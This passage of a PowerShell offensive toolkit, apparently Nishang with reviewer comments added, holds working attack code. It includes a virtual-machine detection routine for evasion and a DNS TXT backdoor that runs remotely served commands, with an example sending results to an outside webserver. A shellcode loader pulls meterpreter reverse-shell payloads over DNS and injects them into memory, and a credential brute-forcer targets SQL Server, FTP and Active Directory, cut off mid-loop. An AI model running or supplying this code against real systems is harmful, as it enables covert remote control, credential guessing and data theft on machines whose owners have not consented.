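 $Base64Strfile,

 [Switch]
 $IsString
 )

 if ($IsString)
 {
 $base64text = $Base64Strfile
 }
 else
 {
 # Get-Content returns one string per line. Joining them keeps a multi-line file
 # decodable; passing the array straight to FromBase64String fails with a
 # FormatException because PowerShell joins array elements with a space.
 $base64text = (Get-Content $Base64Strfile) -join ''
 }

 # Malformed input raises FormatException here; it is left to surface rather than
 # returning a partial or empty result silently.
 $decodedbytes = [System.Convert]::FromBase64String($base64text)
 $decodedstring = [System.Text.Encoding]::Unicode.GetString($decodedbytes)
 $decodedstring
 }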
812
813
814
815########################################################Detects whether it is in a known virtual machine.###########################
816###Based on CheckVM post module in msf by Carlos Perez
function Check-VM
{

<#
.SYNOPSIS
Helper function which detects whether it is running in a known virtual machine.

.DESCRIPTION
This script uses known parameters or 'fingerprints' of Hyper-V, VMWare, Virtual PC, Virtual Box,
Xen and QEMU for detecting the environment. Each hypervisor is checked in turn
against registry keys, BIOS/ACPI strings, service names and process lists; a
message string is emitted for every hypervisor whose fingerprint is found.

.EXAMPLE
PS > Check-VM

.LINK
http://labofapenetrationtester.com/
https://github.com/samratashok/nishang

.NOTES
The script draws heavily from checkvm.rb post module from msf.
https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/checkvm.rb
#>
 [CmdletBinding()] Param()
 # Function-scoped: missing registry keys are expected on most hosts and must not produce errors.
 $ErrorActionPreference = "SilentlyContinue"
 #Hyper-V
 # The $hypervm flag is never initialised; "!$hypervm" is true until a check sets it.
 $hyperv = Get-ChildItem HKLM:\SOFTWARE\Microsoft
 if (($hyperv -match "Hyper-V") -or ($hyperv -match "VirtualMachine"))
 {
 $hypervm = $true
 }

 if (!$hypervm)
 {
 $hyperv = Get-ItemProperty hklm:\HARDWARE\DESCRIPTION\System -Name SystemBiosVersion
 if ($hyperv -match "vrtual")
 {
 $hypervm = $true
 }
 }

 if (!$hypervm)
 {
 $hyperv = Get-ChildItem HKLM:\HARDWARE\ACPI\FADT
 if ($hyperv -match "vrtual")
 {
 $hypervm = $true
 }
 }

 if (!$hypervm)
 {
 $hyperv = Get-ChildItem HKLM:\HARDWARE\ACPI\RSDT
 if ($hyperv -match "vrtual")
 {
 $hypervm = $true
 }
 }

 if (!$hypervm)
 {
 # Hyper-V integration services.
 $hyperv = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
 if (($hyperv -match "vmicheartbeat") -or ($hyperv -match "vmicvss") -or ($hyperv -match "vmicshutdown") -or ($hyperv -match "vmiexchange"))
 {
 $hypervm = $true
 }
 }

 if ($hypervm)
 {

 "This is a Hyper-V machine."

 }

 #VMWARE

 # VMware tools/driver service names.
 $vmware = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
 if (($vmware -match "vmdebug") -or ($vmware -match "vmmouse") -or ($vmware -match "VMTools") -or ($vmware -match "VMMEMCTL"))
 {
 $vmwarevm = $true
 }

 if (!$vmwarevm)
 {
 $vmware = Get-ItemProperty hklm:\HARDWARE\DESCRIPTION\System\BIOS -Name SystemManufacturer
 if ($vmware -match "vmware")
 {
 $vmwarevm = $true
 }
 }

 if (!$vmwarevm)
 {
 # gp is the Get-ItemProperty alias; reads the SCSI device identifier strings.
 $vmware = Get-Childitem hklm:\hardware\devicemap\scsi -recurse | gp -Name identifier
 if ($vmware -match "vmware")
 {
 $vmwarevm = $true
 }
 }

 if (!$vmwarevm)
 {
 # Compares the Process objects from Get-Process (not their Name property) against the strings.
 $vmware = Get-Process
 if (($vmware -eq "vmwareuser.exe") -or ($vmware -match "vmwaretray.exe"))
 {
 $vmwarevm = $true
 }
 }

 if ($vmwarevm)
 {

 "This is a VMWare machine."

 }

 #Virtual PC

 $vpc = Get-Process
 if (($vpc -eq "vmusrvc.exe") -or ($vpc -match "vmsrvc.exe"))
 {
 $vpcvm = $true
 }

 if (!$vpcvm)
 {
 # NOTE(review): this repeats the VMware process check above; probably a copy/paste leftover.
 $vpc = Get-Process
 if (($vpc -eq "vmwareuser.exe") -or ($vpc -match "vmwaretray.exe"))
 {
 $vpcvm = $true
 }
 }

 if (!$vpcvm)
 {
 $vpc = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
 if (($vpc -match "vpc-s3") -or ($vpc -match "vpcuhub") -or ($vpc -match "msvmmouf"))
 {
 $vpcvm = $true
 }
 }

 if ($vpcvm)
 {

 "This is a Virtual PC."

 }


 #Virtual Box

 $vb = Get-Process
 if (($vb -eq "vboxservice.exe") -or ($vb -match "vboxtray.exe"))
 {

 $vbvm = $true

 }
 if (!$vbvm)
 {
 $vb = Get-ChildItem HKLM:\HARDWARE\ACPI\FADT
 if ($vb -match "vbox_")
 {
 $vbvm = $true
 }
 }

 if (!$vbvm)
 {
 $vb = Get-ChildItem HKLM:\HARDWARE\ACPI\RSDT
 if ($vb -match "vbox_")
 {
 $vbvm = $true
 }
 }


 if (!$vbvm)
 {
 $vb = Get-Childitem hklm:\hardware\devicemap\scsi -recurse | gp -Name identifier
 if ($vb -match "vbox")
 {
 $vbvm = $true
 }
 }



 if (!$vbvm)
 {
 $vb = Get-ItemProperty hklm:\HARDWARE\DESCRIPTION\System -Name SystemBiosVersion
 if ($vb -match "vbox")
 {
 $vbvm = $true
 }
 }


 if (!$vbvm)
 {
 # VirtualBox guest additions services.
 $vb = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
 if (($vb -match "VBoxMouse") -or ($vb -match "VBoxGuest") -or ($vb -match "VBoxService") -or ($vb -match "VBoxSF"))
 {
 $vbvm = $true
 }
 }

 if ($vbvm)
 {

 "This is a Virtual Box."

 }



 #Xen

 $xen = Get-Process

 if ($xen -eq "xenservice.exe")
 {

 $xenvm = $true

 }

 if (!$xenvm)
 {
 $xen = Get-ChildItem HKLM:\HARDWARE\ACPI\FADT
 if ($xen -match "xen")
 {
 $xenvm = $true
 }
 }

 if (!$xenvm)
 {
 $xen = Get-ChildItem HKLM:\HARDWARE\ACPI\DSDT
 if ($xen -match "xen")
 {
 $xenvm = $true
 }
 }

 if (!$xenvm)
 {
 $xen = Get-ChildItem HKLM:\HARDWARE\ACPI\RSDT
 if ($xen -match "xen")
 {
 $xenvm = $true
 }
 }


 if (!$xenvm)
 {
 # Xen PV driver service names.
 $xen = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
 if (($xen -match "xenevtchn") -or ($xen -match "xennet") -or ($xen -match "xennet6") -or ($xen -match "xensvc") -or ($xen -match "xenvdb"))
 {
 $xenvm = $true
 }
 }


 if ($xenvm)
 {

 "This is a Xen Machine."

 }


 #QEMU

 $qemu = Get-Childitem hklm:\hardware\devicemap\scsi -recurse | gp -Name identifier
 if ($qemu -match "qemu")
 {

 $qemuvm = $true

 }

 if (!$qemuvm)
 {
 # CPU brand string of the first logical processor.
 $qemu = Get-ItemProperty hklm:HARDWARE\DESCRIPTION\System\CentralProcessor\0 -Name ProcessorNameString
 if ($qemu -match "qemu")
 {
 $qemuvm = $true
 }
 }

 if ($qemuvm)
 {

 "This is a Qemu machine."

 }

}
1118
1119
#####################Acts as a backdoor and is capable of receiving commands and PowerShell scripts from DNS TXT queries.#####################
function DNS_TXT_Pwnage
{

<#
.SYNOPSIS
A backdoor capable of receiving commands and PowerShell scripts from DNS TXT queries.

.DESCRIPTION
This script continuously queries a domain's TXT records. It could be sent commands and powershell scripts using the TXT records which are executed on the target machine.
The PowerShell script which would be served as TXT record must be generated using Out-DnsTxt.ps1 in the Utility folder.

While using the AuthNS option it should be kept in mind that it increases chances of detection.
Leaving the DNS resolution to authorised name server of a target environment may be more desirable.

If using DNS or Webserver ExfilOption, use Invoke-Decode.ps1 in the Utility folder to decode the exfiltrated data.

Detection / risk notes: every poll (roughly every 5 seconds) spawns nslookup.exe as a child of
powershell.exe, and whatever text the TXT record returns is handed to Invoke-Expression with no
authentication or integrity check. Anyone who can answer the DNS query (spoofing, an expired or
taken-over domain) therefore gets code execution on the host running this.

.PARAMETER startdomain
The domain (or subdomain) whose TXT records would be checked regularly for further instructions.

.PARAMETER cmdstring
 The string, if responded by TXT record of startdomain, will make the payload query "commanddomain" for commands.

.PARAMETER commanddomain
The domain (or subdomain) whose TXT records would be used to issue commands to the payload.

.PARAMETER psstring
 The string, if responded by TXT record of startdomain, will make the payload query "psdomain" for encoded powershell script.
 Unlike cmdstring and StopString it is compared with -match, i.e. treated as a regular expression.

.PARAMETER psdomain
The domain (or subdomain) whose subdomains would be used to provide powershell scripts from TXT records.

.PARAMETER Arguments
Arguments to be passed to a script. Powerpreter and other scripts in Nishang need the function name and arguments here.

.PARAMETER subdomains
The number of subdomains which would be used to provide powershell scripts from their TXT records.
The length of DNS TXT records is assumed to be 255 characters, so more than one subdomains would be required.

.PARAMETER stopstring
The string, if responded by TXT record of startdomain, will stop this payload on the target.

.PARAMETER AuthNS
Authoritative Name Server for the domains (or for startdomain in case you are using separate domains).
Startdomain would be changed for commands and an authoritative reply should reflect changes immediately.


.EXAMPLE
PS > DNS_TXT_Pwnage
The payload will ask for all required options.

.EXAMPLE
PS > DNS_TXT_Pwnage -StartDomain start.alteredsecurity.com -cmdstring begincommands -CommandDomain command.alteredsecurity.com -psstring startscript -PSDomain script.alteredsecurity.com -Arguments Get-WLAN-Keys -Subdomains 3 -StopString stop -AuthNS ns8.zoneedit.com
In the above example if you want to execute commands. TXT record of start.alteredsecurity.com
must contain only "begincommands" and command.alteredsecurity.com should contain a single command
you want to execute. The TXT record could be changed live and the payload will pick up updated
record to execute new command.

To execute a script in above example, start.alteredsecurity.com must contain "startscript". As soon it matches, the payload will query
1.script.alteredsecurity.com, 2.script.alteredsecurity.com and 3.script.alteredsecurity.com looking for a base64encoded powershell script.
Use the Arguments parameter if the downloaded script loads a function.
Use the Out-DnsTxt script in the Utility folder to encode scripts to base64.

.EXAMPLE
PS > DNS_TXT_Pwnage -StartDomain start.alteredsecurity.com -cmdstring begincommands -CommandDomain command.alteredsecurity.com -psstring startscript -PSDomain script.alteredsecurity.com -Arguments Get-WLAN-Keys -Subdomains 3 -StopString stop -AuthNS ns8.zoneedit.com | Do-Exfiltration -ExfilOption Webserver -URL http://192.168.254.183/catchpost.php
Use above command for sending POST request to your webserver which is able to log the requests.

.LINK
http://www.labofapenetrationtester.com/2015/01/fun-with-dns-txt-records-and-powershell.html
https://github.com/samratashok/nishang
#>


    # NOTE(review): no parameter below declares a set named "noexfil"; the attribute is
    # harmless but looks left over from a version that carried exfiltration parameters.
    [CmdletBinding(DefaultParameterSetName="noexfil")] Param(

        [Parameter(Position = 0, Mandatory = $True)]
        [String]
        $startdomain,

        [Parameter(Position = 1, Mandatory = $True)]
        [String]
        $cmdstring,

        [Parameter(Position = 2, Mandatory = $True)]
        [String]
        $commanddomain,

        [Parameter(Position = 3, Mandatory = $True)]
        [String]
        $psstring,

        [Parameter(Position = 4, Mandatory = $True)]
        [String]
        $psdomain,

        [Parameter(Position = 5, Mandatory = $False)]
        [String]
        $Arguments = "Out-Null",

        # Declared as [String]; the "-le" comparison below coerces it to a number.
        [Parameter(Position = 6, Mandatory = $True)]
        [String]
        $Subdomains,

        [Parameter(Position = 7, Mandatory = $True)]

        [String]
        $StopString,

        [Parameter(Position = 8, Mandatory = $True)]
        [String]$AuthNS,


        # NOTE(review): accepted but never referenced in the body below.
        [Parameter()]
        [Switch]
        $NoLoadFunction

    )

    # Beacon loop: sleep 5 s, read $startdomain's TXT record, then act on it
    # (command mode, script mode, or stop). Runs until $StopString is served.
    while($true)
    {
        $exec = 0
        start-sleep -seconds 5
        # NOTE(review): $AuthNS is a mandatory [String], so it is never $null here and
        # the else-branch is effectively unreachable when the function is called normally.
        if ($AuthNS -ne $null)
        {
            # Shells out to nslookup.exe (a child process of powershell.exe) and
            # captures its text output.
            $getcode = (Invoke-Expression "nslookup -querytype=txt $startdomain $AuthNS")
        }
        else
        {
            $getcode = (Invoke-Expression "nslookup -querytype=txt $startdomain")
        }
        # Keep only the output lines that contain a double quote (the TXT data lines).
        $tmp = $getcode | select-string -pattern "`""
        # ("`"")[0] is simply the '"' character, so this splits the line on double
        # quotes; element [1] is the text inside the first quoted TXT string.
        $startcode = $tmp -split("`"")[0]
        if ($startcode[1] -eq $cmdstring)
        {
            start-sleep -seconds 5
            if ($AuthNS -ne $null)
            {
                $getcommand = (Invoke-Expression "nslookup -querytype=txt $commanddomain $AuthNS")
            }
            else
            {
                $getcommand = (Invoke-Expression "nslookup -querytype=txt $commanddomain")
            }
            $temp = $getcommand | select-string -pattern "`""
            $command = $temp -split("`"")[0]
            # Arbitrary code execution: the TXT record text is run as PowerShell as-is.
            $pastevalue = Invoke-Expression $command[1]
            $pastevalue
            $exec++
            # $exfil, $ExfilOption, $dev_key, $username, $password, $URL, $DomainName and
            # $ExfilNS are not parameters of this function; they are resolved from the
            # caller's scope (dynamic scoping), presumably set by a wrapper. TODO confirm.
            if ($exfil -eq $True)
            {
                $pastename = $env:COMPUTERNAME + " Results of DNS TXT Pwnage: "
                Do-Exfiltration "$pastename" "$pastevalue" "$ExfilOption" "$dev_key" "$username" "$password" "$URL" "$DomainName" "$ExfilNS"
            }
            # Back off for a minute after running a command so the same record is not
            # re-executed every 5 seconds while the operator is changing it.
            if ($exec -eq 1)
            {
                Start-Sleep -Seconds 60
            }
        }

        # Script mode. -match (regex), unlike the -eq used for $cmdstring and $StopString.
        if ($startcode[1] -match $psstring)
        {

            $i = 1
            # Fetch 1.$psdomain .. N.$psdomain and concatenate their TXT payloads.
            while ($i -le $subdomains)
            {
                if ($AuthNS -ne $null)
                {
                    $getcommand = (Invoke-Expression "nslookup -querytype=txt $i.$psdomain $AuthNS")
                }
                else
                {
                    $getcommand = (Invoke-Expression "nslookup -querytype=txt $i.$psdomain")
                }
                $temp = $getcommand | select-string -pattern "`""
                $tmp1 = ""
                $tmp1 = $tmp1 + $temp
                # Strips whitespace and quotes from the accumulated text.
                # NOTE(review): $encdata is never reset, so if script mode triggers a second
                # time in the same run the previous payload is still prefixed to the new one
                # and the base64/deflate decode below will fail or decode stale data.
                $encdata = $encdata + $tmp1 -replace '\s+', "" -replace "`"", ""
                $i++
            }
            #Decode the downloaded powershell script. The decoding logic is of Invoke-Decode in Utility directory.
            # base64 -> raw DEFLATE stream -> text.
            $dec = [System.Convert]::FromBase64String($encdata)
            $ms = New-Object System.IO.MemoryStream
            $ms.Write($dec, 0, $dec.Length)
            $ms.Seek(0,0) | Out-Null
            $cs = New-Object System.IO.Compression.DeflateStream ($ms, [System.IO.Compression.CompressionMode]::Decompress)
            $sr = New-Object System.IO.StreamReader($cs)
            $command = $sr.readtoend()
            # Runs the decoded script (typically this only defines functions) ...
            $pastevalue = Invoke-Expression $command

            # Check for arguments to the downloaded script.
            # ... then runs $Arguments (e.g. a function name) as a second expression.
            if ($Arguments -ne "Out-Null")
            {
                $pastevalue = Invoke-Expression $Arguments
            }

            $pastevalue
            $exec++
            if ($exfil -eq $True)
            {
                $pastename = $env:COMPUTERNAME + " Results of DNS TXT Pwnage: "
                Do-Exfiltration "$pastename" "$pastevalue" "$ExfilOption" "$dev_key" "$username" "$password" "$URL" "$DomainName" "$ExfilNS"
            }
            if ($exec -eq 1)
            {
                Start-Sleep -Seconds 60
            }

        }

        # Exact match (-eq); a record with extra whitespace would not stop the loop.
        if($startcode[1] -eq $StopString)
        {
            break
        }
    }
}
1335
#####################Execute shellcode in-memory. The shellcode is received from DNS TXT queries.#####################
1337
function Execute-DNSTXT-Code
{


<#
.SYNOPSIS
Payload which could execute shellcode from DNS TXT queries.

.DESCRIPTION
This payload is able to pull shellcode from txt record of a domain.
Below commands could be used to generate shellcode to be usable with this script
./msfvenom -p windows/meterpreter/reverse_https -f powershell LHOST=<>
./msfvenom -p windows/x64/meterpreter/reverse_https -f powershell LHOST=<>

To generate TXT records from above shellcode, use Out-DnsTxt.ps1 in the Utility folder.

Detection notes: the payload spawns nslookup.exe once per subdomain, then allocates
PAGE_EXECUTE_READWRITE memory inside the current powershell.exe process (VirtualAlloc),
copies the bytes in and starts a thread on them (CreateThread) -- a textbook
self-injection sequence that endpoint telemetry commonly flags. The process is then
kept alive by an endless sleep loop.

.PARAMETER shellcode32
The domain (or subdomain) whose subdomain's TXT records would hold 32-bit shellcode.

.PARAMETER shellcode64
The domain (or subdomain) whose subdomain's TXT records would hold 64-bit shellcode.

.PARAMETER AUTHNS
Authoritative Name Server for the domains.

.PARAMETER subdomains
The number of subdomains which would be used to provide shellcode from their TXT records.


.EXAMPLE
PS > Execute-DNSTXT-Code
The payload will ask for all required options.

.EXAMPLE
PS > Execute-DNSTXT-Code 32.alteredsecurity.com 64.alteredsecurity.com ns8.zoneedit.com -SubDomains 5
Use above from non-interactive shell.

.LINK
http://www.labofapenetrationtester.com/2015/01/fun-with-dns-txt-records-and-powershell.html
https://github.com/samratashok/nishang

.NOTES
The code execution logic is based on this post by Matt.
http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html
#>


    [CmdletBinding()] Param(
        [Parameter(Position = 0, Mandatory = $True)]
        [String]
        $ShellCode32,

        [Parameter(Position = 1, Mandatory = $True)]
        [String]
        $ShellCode64,

        [Parameter(Position = 2, Mandatory = $True)]
        [String]
        $AuthNS,

        # Declared as [String]; the "-le" comparison below coerces it to a number.
        [Parameter(Position = 3, Mandatory = $True)]
        [String]
        $Subdomains

    )

    #Function to get shellcode from TXT records
    # Queries 1.<domain> .. N.<domain>, concatenates the quoted TXT strings and
    # base64/deflate-decodes them back into msfvenom's "-f powershell" text.
    # $subdomains and $AuthNS are read from the enclosing function's scope.
    function Get-ShellCode
    {
        Param(
            [Parameter()]
            [String]
            $ShellCode
        )
        $i = 1
        while ($i -le $subdomains)
        {
            # NOTE(review): $AuthNS is a mandatory [String], so it is never $null and
            # the else-branch is effectively unreachable.
            if ($AuthNS -ne $null)
            {
                # One nslookup.exe child process per subdomain.
                $getcommand = (Invoke-Expression "nslookup -querytype=txt $i.$ShellCode $AuthNS")
            }
            else
            {
                $getcommand = (Invoke-Expression "nslookup -querytype=txt $i.$ShellCode")
            }
            # Keep only the output lines containing a double quote (the TXT data lines),
            # then strip whitespace and quotes before appending.
            $temp = $getcommand | select-string -pattern "`""
            $tmp1 = ""
            $tmp1 = $tmp1 + $temp
            $encdata = $encdata + $tmp1 -replace '\s+', "" -replace "`"", ""
            $i++
        }
        #Decode the downloaded powershell script. The decoding logic is of Invoke-Decode in Utility directory.
        # base64 -> raw DEFLATE stream -> text.
        $dec = [System.Convert]::FromBase64String($encdata)
        $ms = New-Object System.IO.MemoryStream
        $ms.Write($dec, 0, $dec.Length)
        $ms.Seek(0,0) | Out-Null
        $cs = New-Object System.IO.Compression.DeflateStream ($ms, [System.IO.Compression.CompressionMode]::Decompress)
        $sr = New-Object System.IO.StreamReader($cs)
        $sc = $sr.readtoend()
        return $sc
    }
    # Choose by the bitness of this PowerShell process, not of the OS.
    if ([IntPtr]::Size -eq 8)
    {
        $Shell64 = (Get-ShellCode $ShellCode64)
        #Remove unrequired things from msf shellcode
        # Collapses msfvenom's "[Byte[]] $buf = 0x..,0x.." / "$buf += 0x..,.." lines into
        # one comma-separated list; the [Byte[]] cast then parses each "0x.." token.
        $tmp = $Shell64 -replace "`n","" -replace '\$buf \+\= ',"," -replace '\[Byte\[\]\] \$buf \=' -replace " "
        [Byte[]]$sc = $tmp -split ','
    }
    else
    {
        $shell32 = (Get-ShellCode $ShellCode32)
        $tmp = $Shell32 -replace "`n","" -replace '\$buf \+\= ',"," -replace '\[Byte\[\]\] \$buf \=' -replace " "
        [Byte[]]$sc = $tmp -split ','
    }

    #Code Execution logic
    # P/Invoke declarations. Note VirtualAlloc's parameter order:
    # (lpAddress, dwSize, flAllocationType, flProtect).
    $code = @'
    [DllImport("kernel32.dll")]
    public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
    [DllImport("kernel32.dll")]
    public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
    [DllImport("msvcrt.dll")]
    public static extern IntPtr memset(IntPtr dest, uint src, uint count);
'@
    $winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru
    $size = 0x1000
    if ($sc.Length -gt 0x1000) {$size = $sc.Length}
    # NOTE(review): the arguments do not line up with the declaration above: dwSize is
    # always 0x1000 and $size is passed in the flAllocationType position. For payloads
    # of at most 4 KiB this only works because $size == 0x1000 == MEM_COMMIT; a larger
    # payload gets a 4 KiB buffer and a nonsense flag value. Confirm before relying on
    # it for bigger shellcode. 0x40 = PAGE_EXECUTE_READWRITE.
    $x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40)
    # Copies the bytes one at a time through memset (one P/Invoke call per byte).
    # NOTE(review): $x.ToInt32() in a 64-bit process may throw OverflowException if the
    # allocation lands above 4 GiB; ToInt64() would be safe on both bitnesses.
    for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)}
    # Starts the shellcode on a new thread in this process; the thread handle is
    # written to the output stream.
    $winFunc::CreateThread(0,0,$x,0,0,0)
    # Keep the process -- and so the shellcode thread -- alive indefinitely.
    while($True)
    {
        start-sleep -Seconds 100
    }
}
1473
1474
1475###############################################convert an executable to text file.#######################################################
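function ExetoText
{
<#
.SYNOPSIS
Nishang script to convert an executable to text file.

.DESCRIPTION
Reads every byte of the executable and writes them to a text file as
space-separated decimal values (e.g. "77 90 144 0 ..."). This is exactly the
format TexttoEXE reads back; the "hex" wording in older comments is historical,
the output is decimal.

.PARAMETER EXE
The path of the executable to be converted. Relative paths are resolved against
the current PowerShell location.

.PARAMETER FileName
Path of the text file to which executable will be converted. Relative paths are
resolved against the current PowerShell location (not the process working
directory, which .NET static methods would otherwise use).

.EXAMPLE
PS > ExetoText C:\binaries\evil.exe C:\test\evil.txt

.LINK
http://www.exploit-monday.com/2011/09/dropping-executables-with-powershell.html
https://github.com/samratashok/nishang
#>
    [CmdletBinding()] Param(
        [Parameter(Position = 0, Mandatory = $True)]
        [String]
        $EXE,

        [Parameter(Position = 1, Mandatory = $True)]
        [String]
        $Filename
    )
    # Resolve both paths through the PowerShell provider so relative paths follow
    # $PWD. [System.IO.File] resolves relative paths against the process working
    # directory, which is frequently not the same place.
    $exePath = $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath($EXE)
    $outPath = $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath($Filename)

    # ReadAllBytes works on every PowerShell version; "Get-Content -Encoding Byte"
    # was removed in PowerShell 6 (replaced by -AsByteStream).
    [byte[]] $bytes = [System.IO.File]::ReadAllBytes($exePath)

    # Join with a literal space instead of relying on $OFS, so the output always
    # matches the "-split ' '" TexttoEXE performs even if the caller changed $OFS.
    $text = $bytes -join ' '
    [System.IO.File]::WriteAllLines($outPath, [string[]]@($text))
    Write-Output "Converted file written to $Filename"
}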
1511
1512
1513
1514################################Performs a Brute-Force Attack against SQL Server, Active Directory, Web and FTP.###########################
1515####Thanks Niklas Goude#####
1516###http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/03/use-powershell-to-security-test-sql-server-and-sharepoint.aspx
1517
function Invoke-BruteForce
{
 <#
.SYNOPSIS
Nishang payload which performs a Brute-Force Attack against SQL Server, Active Directory, Web and FTP.

.DESCRIPTION
This payload can brute force credentials for SQL Server, ActiveDirectory, Web or FTP.
Every password is tried for the first user before moving to the next user, which is the
pattern most likely to trip account lockout; check the target's lockout policy before
running it against ActiveDirectory.

.PARAMETER Computername
Specifies a SQL Server, Domain, FTP Site or Web Site.

.PARAMETER UserList
Specify a list of users. If blank, trusted connection will be used for SQL and an error will be generated for other services.

.PARAMETER PasswordList
Specify a list of passwords.

.PARAMETER Service
Enter a Service from SQL, ActiveDirectory, FTP and Web. Default service is set to SQL.

.PARAMETER StopOnSuccess
Use this switch to stop the brute forcing on the first success. Honoured by the FTP,
ActiveDirectory and Web paths; the SQL path always stops at the first match (see the
comments in CheckForSQLSuccess).

.EXAMPLE
PS > Invoke-BruteForce -ComputerName SQLServ01 -UserList C:\test\users.txt -PasswordList C:\test\wordlist.txt -Service SQL -Verbose
Brute force a SQL Server SQLServ01 for users listed in users.txt and passwords in wordlist.txt

.EXAMPLE
PS > Invoke-BruteForce -ComputerName targetdomain.com -UserList C:\test\users.txt -PasswordList C:\test\wordlist.txt -Service ActiveDirectory -StopOnSuccess -Verbose
Brute force a Domain Controller of targetdomain.com for users listed in users.txt and passwords in wordlist.txt.
Since StopOnSuccess is specified, the brute forcing stops on first success.

.EXAMPLE
PS > cat C:\test\servers.txt | Invoke-BruteForce -UserList C:\test\users.txt -PasswordList C:\test\wordlist.txt -Service SQL -Verbose
Brute force SQL Service on all the servers specified in servers.txt

.LINK
http://www.truesec.com
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/03/use-powershell-to-security-test-sql-server-and-sharepoint.aspx
https://github.com/samratashok/nishang

.NOTES
Goude 2012, TreuSec
#>
    [CmdletBinding()] Param(
        [Parameter(Mandatory = $true, Position = 0, ValueFromPipeline=$true)]
        [Alias("PSComputerName","CN","MachineName","IP","IPAddress","Identity","Url","Ftp","Domain","DistinguishedName")]
        [String]
        $ComputerName,

        [Parameter(Position = 1, Mandatory = $false)]
        [String]
        $UserList,

        [Parameter(Position = 2, Mandatory = $false)]
        [String]
        $PasswordList,

        [Parameter(Position = 3, Mandatory = $false)] [ValidateSet("SQL","FTP","ActiveDirectory","Web")]
        [String]
        $Service = "SQL",

        [Parameter(Position = 4, Mandatory = $false)]
        [Switch]
        $StopOnSuccess
    )

    Process
    {
        # Runs once per pipeline input, so both files are re-read for every ComputerName.
        # NOTE(review): Get-Content with an empty path errors, so the "blank UserList"
        # case described above does not reach the trusted-connection branch cleanly.
        $usernames = Get-Content $UserList
        $passwords = Get-Content $PasswordList
        #Brute force SQL Server
        $Connection = New-Object System.Data.SQLClient.SQLConnection
        # Opens $Connection (its ConnectionString is set by the caller) and reports the
        # server version on success. $username / $Password are the caller's loop
        # variables, reached through dynamic scoping.
        function CheckForSQLSuccess
        {
            Try
            {
                $Connection.Open()
                $success = $true
            }
            Catch
            {
                $success = $false
            }
            if($success -eq $true)
            {
                Write-Output "Match found! $username : $Password"
                # NOTE(review): the connection is left open; assigning a new ConnectionString
                # to an open SqlConnection throws, so this relies on the labelled break below
                # leaving the loop at once. That break crosses a function boundary (PowerShell
                # unwinds until it finds the label); in the trusted-connection branch there is
                # no UsernameLoop, so it unwinds further and can end the caller's pipeline.
                # -StopOnSuccess is not consulted on this path. The second "^6" pattern is
                # unreachable and presumably was meant to be "^7".
                switch ($connection.ServerVersion) {
                    { $_ -match "^6" } { "SQL Server 6.5";Break UsernameLoop }
                    { $_ -match "^6" } { "SQL Server 7";Break UsernameLoop }
                    { $_ -match "^8" } { "SQL Server 2000";Break UsernameLoop }
                    { $_ -match "^9" } { "SQL Server 2005";Break UsernameLoop }
                    { $_ -match "^10\.00" } { "SQL Server 2008";Break UsernameLoop }
                    { $_ -match "^10\.50" } { "SQL Server 2008 R2";Break UsernameLoop }
                    { $_ -match "^11" } { "SQL Server 2012";Break UsernameLoop }
                    { $_ -match "^12" } { "SQL Server 2014";Break UsernameLoop }
                    Default { "Unknown" }
                }
            }
        }
        if($service -eq "SQL")
        {
            Write-Output "Brute Forcing SQL Service on $ComputerName"
            if($userList)
            {
                :UsernameLoop foreach ($username in $usernames)
                {
                    foreach ($Password in $Passwords)
                    {
                        # Plain SQL authentication; the password travels in the connection string.
                        $Connection.ConnectionString = "Data Source=$ComputerName;Initial Catalog=Master;User Id=$userName;Password=$password;"
                        Write-Verbose "Checking $userName : $password"
                        CheckForSQLSuccess
                    }
                }
            }
            else
            {
                #If no username is provided, use trusted connection
                # NOTE(review): $identity is never assigned in this function, so the server
                # part of this connection string is empty; $ComputerName looks intended.
                $Connection.ConnectionString = "server=$identity;Initial Catalog=Master;trusted_connection=true;"
                CheckForSQLSuccess

            }
        }

        #Brute Force FTP
        elseif ($service -eq "FTP")
        {
            if($ComputerName -notMatch "^ftp://")
            {
                $source = "ftp://" + $ComputerName
            }
            else
            {
                $source = $ComputerName
            }
            Write-Output "Brute Forcing FTP on $ComputerName"

            :UsernameLoop foreach ($username in $usernames)
            {
                foreach ($Password in $Passwords)
                {
                    try
                    {
                        # A directory listing that succeeds means the credentials were accepted.
                        $ftpRequest = [System.Net.FtpWebRequest]::Create($source)
                        $ftpRequest.Method = [System.Net.WebRequestMethods+Ftp]::ListDirectoryDetails
                        Write-Verbose "Checking $userName : $password"
                        $ftpRequest.Credentials = new-object System.Net.NetworkCredential($userName, $password)
                        $result = $ftpRequest.GetResponse()
                        # $message and $success are recorded but never output on this path.
                        $message = $result.BannerMessage + $result.WelcomeMessage
                        Write-Output "Match found! $username : $Password"
                        $success = $true
                        if ($StopOnSuccess)
                        {
                            break UsernameLoop
                        }
                    }

                    catch
                    {
                        $message = $error[0].ToString()
                        $success = $false
                    }
                }
            }
        }

        #Brute Force Active Directory
        elseif ($service -eq "ActiveDirectory")
        {
            Write-Output "Brute Forcing Active Directory $ComputerName"
            Add-Type -AssemblyName System.DirectoryServices.AccountManagement
            $contextType = [System.DirectoryServices.AccountManagement.ContextType]::Domain
            Try
            {
                $principalContext = New-Object System.DirectoryServices.AccountManagement.PrincipalContext($contextType, $ComputerName)
                $success = $true
            }
            Catch
            {
                $message = "Unable to contact Domain"
                $success = $false
            }
            if($success -ne $false)
            {
                :UsernameLoop foreach ($username in $usernames)
                {
                    foreach ($Password in $Passwords)
                    {
                        Try
                        {
                            Write-Verbose "Checking $userName : $password"
